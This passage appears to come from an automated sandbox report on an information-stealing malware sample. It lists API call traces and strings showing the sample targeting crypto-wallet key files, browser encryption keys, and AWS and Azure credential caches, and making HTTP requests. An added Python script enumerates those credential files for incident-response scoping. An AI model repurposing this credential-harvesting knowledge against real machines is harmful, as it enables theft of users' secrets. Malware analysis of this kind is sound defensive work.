                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0100CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0100D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0100D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D208
                        • lstrcat.KERNEL32(?,01021478), ref: 0100D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D22A
                        • lstrcat.KERNEL32(?,0102147C), ref: 0100D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D24C
                        • lstrcat.KERNEL32(?,01021480), ref: 0100D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D26E
                        • lstrcat.KERNEL32(?,01021484), ref: 0100D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D290
                        • lstrcat.KERNEL32(?,01021488), ref: 0100D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D2B2
                        • lstrcat.KERNEL32(?,0102148C), ref: 0100D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D2D4
                        • lstrcat.KERNEL32(?,01021490), ref: 0100D2E3
                          • Part of subcall function 0101A820: lstrlen.KERNEL32(01004F05,?,?,01004F05,01020DDE), ref: 0101A82B
                          • Part of subcall function 0101A820: lstrcpy.KERNEL32(01020DDE,00000000), ref: 0101A885
                        • lstrlen.KERNEL32(?), ref: 0100D32A
                        • lstrlen.KERNEL32(?), ref: 0100D339
                          • Part of subcall function 0101AA70: StrCmpCA.SHLWAPI(018992A8,0100A7A7,?,0100A7A7,018992A8), ref: 0101AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0100D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: c680fb2a18baff771e86ad44d28a027aaaa1bf0f5499aa91693aca84b715747f
                        • Instruction ID: cf69ece2a7ad34bf8ccea476b76a4c70cf266c8da06a204108f0a6010b1d9d4c
                        • Opcode Fuzzy Hash: c680fb2a18baff771e86ad44d28a027aaaa1bf0f5499aa91693aca84b715747f
                        • Instruction Fuzzy Hash: 31E16175A51149EBDB14EBE0ED98EEE7378BF24200F504158F547B7098DF39AA0ACB60
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0189D068,00000000,?,0102144C,00000000,?,?), ref: 0100CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0100CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0100CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0100CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0100CAD9
                        • StrStrA.SHLWAPI(?,0189D098,01020B52), ref: 0100CAF7
                        • StrStrA.SHLWAPI(00000000,0189D0B0), ref: 0100CB1E
                        • StrStrA.SHLWAPI(?,0189DCC0,00000000,?,01021458,00000000,?,00000000,00000000,?,018991B8,00000000,?,01021454,00000000,?), ref: 0100CCA2
                        • StrStrA.SHLWAPI(00000000,0189DA20), ref: 0100CCB9
                          • Part of subcall function 0100C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0100C871
                          • Part of subcall function 0100C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0100C87C
                        • StrStrA.SHLWAPI(?,0189DA20,00000000,?,0102145C,00000000,?,00000000,01899138), ref: 0100CD5A
                        • StrStrA.SHLWAPI(00000000,018990C8), ref: 0100CD71
                          • Part of subcall function 0100C820: lstrcat.KERNEL32(?,01020B46), ref: 0100C943
                          • Part of subcall function 0100C820: lstrcat.KERNEL32(?,01020B47), ref: 0100C957
                          • Part of subcall function 0100C820: lstrcat.KERNEL32(?,01020B4E), ref: 0100C978
                        • lstrlen.KERNEL32(00000000), ref: 0100CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0100CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: 557b37390b4b869a4e9061b16e59d4d77b74d861204ba5beac40769fb82b3182
                        • Instruction ID: 2df4ef8cf75281f258c330cc116ad023f7048dbe6fd02a4ced9922e478d863fd
                        • Opcode Fuzzy Hash: 557b37390b4b869a4e9061b16e59d4d77b74d861204ba5beac40769fb82b3182
                        • Instruction Fuzzy Hash: 69E16D76A01149EBDB15EBA0EC94FEEB778AF24300F404159F54767198EF386A4ACF60
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • RegOpenKeyExA.ADVAPI32(00000000,0189B548,00000000,00020019,00000000,010205B6), ref: 010183A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 01018426
                        • wsprintfA.USER32 ref: 01018459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0101847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0101848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 01018499
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 3622a5d18f894f103bbd4f80b0adaa1c74e8a3ba7a8b0172b2183ab24db0b130
                        • Instruction ID: d121c90d6419e74338c123af60b3af8ca3e1092406dded52bbb6e49741aed540
                        • Opcode Fuzzy Hash: 3622a5d18f894f103bbd4f80b0adaa1c74e8a3ba7a8b0172b2183ab24db0b130
                        • Instruction Fuzzy Hash: 0C812A75911118EBEB28DB54DD84FEAB7B8FB18310F0086D9E14AA7144DF746B89CFA0
                        APIs
                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 01014DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 01014DCD
                          • Part of subcall function 01014910: wsprintfA.USER32 ref: 0101492C
                          • Part of subcall function 01014910: FindFirstFileA.KERNEL32(?,?), ref: 01014943
                        • lstrcat.KERNEL32(?,00000000), ref: 01014E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 01014E59
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,01020FDC), ref: 01014971
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,01020FE0), ref: 01014987
                          • Part of subcall function 01014910: FindNextFileA.KERNEL32(000000FF,?), ref: 01014B7D
                          • Part of subcall function 01014910: FindClose.KERNEL32(000000FF), ref: 01014B92
                        • lstrcat.KERNEL32(?,00000000), ref: 01014EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 01014EE5
                          • Part of subcall function 01014910: wsprintfA.USER32 ref: 010149B0
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,010208D2), ref: 010149C5
                          • Part of subcall function 01014910: wsprintfA.USER32 ref: 010149E2
                          • Part of subcall function 01014910: PathMatchSpecA.SHLWAPI(?,?), ref: 01014A1E
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,0189E968), ref: 01014A4A
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,01020FF8), ref: 01014A5C
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,?), ref: 01014A70
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,01020FFC), ref: 01014A82
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,?), ref: 01014A96
                          • Part of subcall function 01014910: CopyFileA.KERNEL32(?,?,00000001), ref: 01014AAC
                          • Part of subcall function 01014910: DeleteFileA.KERNEL32(?), ref: 01014B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 8a3468e1218835d060d21dd2c75fc4a30d7306d4773179b1728554976aa9cfa5
                        • Instruction ID: b8d9197531f6e80f7f8c99fc0579c760f684e13dd2d7d2bd7d4b8829a531fbff
                        • Opcode Fuzzy Hash: 8a3468e1218835d060d21dd2c75fc4a30d7306d4773179b1728554976aa9cfa5
                        • Instruction Fuzzy Hash: 3A41797AA40219A7D750F770EC86FDD73389B34704F404558B5C55A084EEF997898B92
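The routine above appends \.azure\, \.aws\ and \.IdentityService\ to a profile path, walks each directory with FindFirstFileA/FindNextFileA against a "*.*" spec checked through PathMatchSpecA, copies the matches with CopyFileA and removes the copy with DeleteFileA afterwards; the msal.cache string shows it is after MSAL token caches as well as AWS CLI files. The script below is an added scoping aid, not the sample's code: it lists what such a walk would pick up on a host so the IR team knows which Azure tokens and AWS access keys to revoke. Assumptions: the profile roots (USERPROFILE and LOCALAPPDATA), the HIGH_VALUE file names beyond msal.cache, and the fnmatch interpretation of "*.*" (which requires a dot, so extension-less files such as .aws\credentials only appear when the spec is widened to "*"; whether PathMatchSpecA behaves the same way was not verified here). The fixture directory is constructed for offline demonstration.

```python
"""List the cloud-credential files the harvesting routine would collect."""
import fnmatch
import os
import tempfile
from typing import Dict, List

# Sub-directories the sample appends to the profile path (from the report).
TARGET_DIRS = [".azure", ".aws", ".IdentityService"]
# File-name spec the sample hands to PathMatchSpecA (from the report).
DEFAULT_SPEC = "*.*"
# Files whose presence means live credentials were exposed. Only msal.cache is
# named in the report; the others are the standard Azure CLI / AWS CLI stores
# and are an assumption for this example.
HIGH_VALUE = {"msal.cache", "credentials", "config", "accessTokens.json", "azureProfile.json"}


def profile_roots() -> List[str]:
    """Roots under which the targeted directories live on a real Windows host."""
    return [os.environ[v] for v in ("USERPROFILE", "LOCALAPPDATA") if os.environ.get(v)]


def harvestable_files(roots: List[str], spec: str = DEFAULT_SPEC) -> List[Dict[str, object]]:
    """Every file under <root>\\<target>\\ (recursively) whose name matches spec."""
    found: List[Dict[str, object]] = []
    for root in roots:
        for sub in TARGET_DIRS:
            base = os.path.join(root, sub)
            if not os.path.isdir(base):
                continue
            for dirpath, _dirs, files in os.walk(base):
                for name in files:
                    if not fnmatch.fnmatch(name, spec):
                        continue
                    full = os.path.join(dirpath, name)
                    found.append({
                        "name": name,
                        "path": full,
                        "store": sub,
                        "size": os.path.getsize(full),
                        "high_value": name in HIGH_VALUE,
                    })
    return found


def revoke_actions(files: List[Dict[str, object]]) -> List[str]:
    """Map exposed stores to the credential that must be revoked or rotated."""
    actions = set()
    for f in files:
        if not f["high_value"]:
            continue
        if f["store"] == ".aws":
            actions.add("rotate AWS access keys in ~/.aws/credentials")
        elif f["store"] in (".azure", ".IdentityService"):
            actions.add("revoke Azure AD / MSAL refresh tokens for the user")
    return sorted(actions)


def demo_fixture() -> str:
    """Create a constructed profile tree in a temp dir (offline demonstration only)."""
    base = tempfile.mkdtemp(prefix="cred-scope-")
    layout = {
        ".azure": {"msal.cache": b"\x00" * 64, "azureProfile.json": b"{}"},
        ".aws": {"credentials": b"[default]\n", "config.bak": b"[default]\n"},
        ".IdentityService": {"msal.cache": b"\x00" * 32},
    }
    for sub, files in layout.items():
        os.makedirs(os.path.join(base, sub), exist_ok=True)
        for name, data in files.items():
            with open(os.path.join(base, sub, name), "wb") as fh:
                fh.write(data)
    return base


if __name__ == "__main__":
    roots = profile_roots() or [demo_fixture()]
    hits = harvestable_files(roots, "*")  # widen the spec to get the superset
    for h in hits:
        print(("!! " if h["high_value"] else "   ") + str(h["path"]))
    print("actions:", revoke_actions(hits))
```

On a live host run it with the widened "*" spec and treat every listed high-value file as compromised; the default "*.*" spec reproduces the narrower match the report shows.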
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0101906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 7db5e11c2454597d1ac7c57dbd37df078c5d64e09fb6d9c568ccd7f3166ff4f6
                        • Instruction ID: b5e385e978d2b794a18f739b23a526ad0adf13e5a9801a0190b007a412891ff5
                        • Opcode Fuzzy Hash: 7db5e11c2454597d1ac7c57dbd37df078c5d64e09fb6d9c568ccd7f3166ff4f6
                        • Instruction Fuzzy Hash: 5571F075950208EBDB14DFE4E898FDEB7B9FF48700F108508F556AB284DB38A905CB60
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 010131C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 0101335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 010134EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 7c9fddecd6166be470e62a1dc9d32532d61a89c8ad236c0c3c5eaa80e48f3d5c
                        • Instruction ID: 9f0344c55323d132c384d635bf135b606743c406a7e5898bd4ae8af5dd0c6357
                        • Opcode Fuzzy Hash: 7c9fddecd6166be470e62a1dc9d32532d61a89c8ad236c0c3c5eaa80e48f3d5c
                        • Instruction Fuzzy Hash: 37121D71901149DADB19FBA0DD91FEEB738AF24310F504159E58667198EF382B8ECFA0
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 01006280: InternetOpenA.WININET(01020DFE,00000001,00000000,00000000,00000000), ref: 010062E1
                          • Part of subcall function 01006280: StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01006303
                          • Part of subcall function 01006280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01006335
                          • Part of subcall function 01006280: HttpOpenRequestA.WININET(00000000,GET,?,0189E020,00000000,00000000,00400100,00000000), ref: 01006385
                          • Part of subcall function 01006280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 010063BF
                          • Part of subcall function 01006280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010063D1
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01015318
                        • lstrlen.KERNEL32(00000000), ref: 0101532F
                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 01015364
                        • lstrlen.KERNEL32(00000000), ref: 01015383
                        • lstrlen.KERNEL32(00000000), ref: 010153AE
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 1ffbd54b819cc7739108674ef2fc06f51c1fd167eed788f6d405f4b5d64ced12
                        • Instruction ID: a0ecfb71256971907f52b92babdbf04f34d9b68b7908e1a25748640e09902b91
                        • Opcode Fuzzy Hash: 1ffbd54b819cc7739108674ef2fc06f51c1fd167eed788f6d405f4b5d64ced12
                        • Instruction Fuzzy Hash: D7513030A1118ADBDB18FF60CD95AED7779AF20311F504018F8879B594EF386B0ACBA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: de93d88b10c2cabd61461cb17687f9afa4f1afff2010af9037c51b40e9db28e8
                        • Instruction ID: 6a03e786c554153e3afdcf72d6c233013de4d85d349a48fae536941b616b1bc5
                        • Opcode Fuzzy Hash: de93d88b10c2cabd61461cb17687f9afa4f1afff2010af9037c51b40e9db28e8
                        • Instruction Fuzzy Hash: BBC1B7B5A412199BCB14EF60DC88FDE7378BF64304F0045D9E54AA7244EB78AA85CF90
                        APIs
                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 010142EC
                        • lstrcat.KERNEL32(?,0189E488), ref: 0101430B
                        • lstrcat.KERNEL32(?,?), ref: 0101431F
                        • lstrcat.KERNEL32(?,0189CF30), ref: 01014333
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 01018D90: GetFileAttributesA.KERNEL32(00000000,?,01001B54,?,?,0102564C,?,?,01020E1F), ref: 01018D9F
                          • Part of subcall function 01009CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 01009D39
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                          • Part of subcall function 010193C0: GlobalAlloc.KERNEL32(00000000,010143DD,010143DD), ref: 010193D3
                        • StrStrA.SHLWAPI(?,0189E470), ref: 010143F3
                        • GlobalFree.KERNEL32(?), ref: 01014512
                          • Part of subcall function 01009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009AEF
                          • Part of subcall function 01009AC0: LocalAlloc.KERNEL32(00000040,?,?,?,01004EEE,00000000,?), ref: 01009B01
                          • Part of subcall function 01009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009B2A
                          • Part of subcall function 01009AC0: LocalFree.KERNEL32(?,?,?,?,01004EEE,00000000,?), ref: 01009B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 010144A3
                        • StrCmpCA.SHLWAPI(?,010208D1), ref: 010144C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 010144D2
                        • lstrcat.KERNEL32(00000000,?), ref: 010144E5
                        • lstrcat.KERNEL32(00000000,01020FB8), ref: 010144F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: f199dc34192535353bcbc13a881afa163e2a87e43a5708e056773019c9066dcf
                        • Instruction ID: b453b5aca1d03e580c2885f76c0adb69ea48807cfeb17f52b37f72ffd0e294aa
                        • Opcode Fuzzy Hash: f199dc34192535353bcbc13a881afa163e2a87e43a5708e056773019c9066dcf
                        • Instruction Fuzzy Hash: E171A8B6D00209ABDB14EBE0EC89FEE7379BB58304F048598E64697184EB34DB45CF91
                        APIs
                          • Part of subcall function 010012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 010012B4
                          • Part of subcall function 010012A0: RtlAllocateHeap.NTDLL(00000000), ref: 010012BB
                          • Part of subcall function 010012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 010012D7
                          • Part of subcall function 010012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 010012F5
                          • Part of subcall function 010012A0: RegCloseKey.ADVAPI32(?), ref: 010012FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0100134F
                        • lstrlen.KERNEL32(?), ref: 0100135C
                        • lstrcat.KERNEL32(?,.keys), ref: 01001377
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 01001465
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 010014EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
